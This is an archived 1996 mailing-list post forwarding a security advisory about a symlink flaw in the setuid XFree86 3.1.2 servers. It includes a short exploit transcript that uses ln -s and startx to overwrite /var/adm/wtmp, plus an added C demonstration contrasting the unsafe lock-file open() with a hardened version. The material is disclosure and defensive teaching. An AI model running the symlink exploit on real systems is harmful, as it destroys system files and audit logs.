Date:      Mon, 29 Jan 96 11:44:35 -0800
From:      Cy Schubert - BCSC Open Systems Group <cschuber@uumail.gov.bc.ca>
To:        freebsd-security@freebsd.org
Subject:   XFree86 3.1.2 Security Problems  
Message-ID:  <199601291944.LAA11338@passer.osg.gov.bc.ca>

I just received this from another security news group.  I haven't had a chance 
to verify this under FreeBSD (at home), however I have no reason to believe that 
this wouldn't affect FreeBSD as well.  Would anyone be willing to comment on 
this?


Regards,                       Phone:  (604)389-3827
Cy Schubert                    OV/VM:  BCSC02(CSCHUBER)
Open Systems Support          BITNET:  CSCHUBER@BCSC02.BITNET
BC Systems Corp.            Internet:  cschuber@uumail.gov.bc.ca
                                       cschuber@bcsc02.gov.bc.ca

		"Quit spooling around, JES do it."


------- Forwarded Message


   There are security holes in XFree86 3.1.2, which installs its servers
as suid root (/usr/X11R6/bin/XF86_*).  When reading and writing files, 
it does not take proper precautions to ensure that file permissions are
maintained, resulting in the ability to overwrite files, and to read
limited portions of other files.
   The first problem stems from the server opening a temporary file,
/tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC).  By making this
file a symlink, the server will overwrite the original file, and then
write to it its current pid.  
   Other problems exist in the server relating to similar problems, one
such example is the ability to specify an arbitrary file for the XF86config
file which will then be opened, and the first line that fails to match
the expected format will be output with an error, allowing a line to be
read from an arbitrary file.

                   Program: XFree86 3.1.2 servers
Affected Operating Systems: All systems with XFree86 3.1.2 installed
              Requirements: account on system
           Temporary Patch: chmod o-x /usr/X11R6/bin/XF86*
       Security Compromise: overwrite arbitrary files
                    Author: Dave M. (davem@cmu.edu)
                  Synopsis: While running suid root, XFree86 servers do
                            not properly check file permissions, allowing
                            a user to overwrite arbitrary files on a 
                            system.


Exploit:
$ ls -l /var/adm/wtmp
-rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
$ ln -s /var/adm/wtmp /tmp/.tX0-lock
$ startx
(At this point exit X if it started, or else ignore any error messages)
$ ls -l /var/adm/wtmp
-r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp



       /-------------\
       |David Meltzer| 
       |davem@cmu.edu|    
 /--------------------------\
 |School of Computer Science|
 |Carnegie Mellon University|
 \--------------------------/

------- End of Forwarded Message
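
The lock-file problem described in the forwarded advisory, as an added example that is not part of the original message and is not XFree86 source: the open() flags quoted above beside a hardened variant that refuses a pre-existing name. The function names, the scratch directory, the victim file and the pid format are assumptions constructed for the demonstration.

```c
/* Added example, not XFree86 source: the lock-file open() the advisory
 * describes, beside a hardened variant. All names here are constructed. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Flags from the advisory: follows a symlink and truncates its target. */
int write_lock_unsafe(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    dprintf(fd, "%10ld\n", (long)getpid());   /* 11 bytes; format assumed */
    return close(fd);
}

/* Hardened: O_CREAT|O_EXCL fails with EEXIST if the name already exists,
 * symlinks included; O_NOFOLLOW is kept as a second guard. */
int write_lock_safe(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0444);
    if (fd < 0) return -1;
    dprintf(fd, "%10ld\n", (long)getpid());
    return close(fd);
}

/* Builds a private directory with a 19-byte "victim" file and a symlink to it
 * named like the lock file, runs one writer, returns the victim's new size. */
long victim_size_after(int hardened) {
    char dir[] = "/tmp/lockdemoXXXXXX", victim[64], lock[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lock, sizeof lock, "%s/.tX0-lock", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("important log data\n", f); fclose(f);
    if (symlink(victim, lock) != 0) return -1;
    if (hardened) write_lock_safe(lock); else write_lock_unsafe(lock);
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(lock); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    printf("unsafe writer: victim now %ld bytes\n", victim_size_after(0));
    printf("safe writer:   victim now %ld bytes\n", victim_size_after(1));
    return 0;
}
```

With the advisory's flags the victim file is truncated and left holding only the pid line; with the hardened flags the open fails and the victim keeps its original contents.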



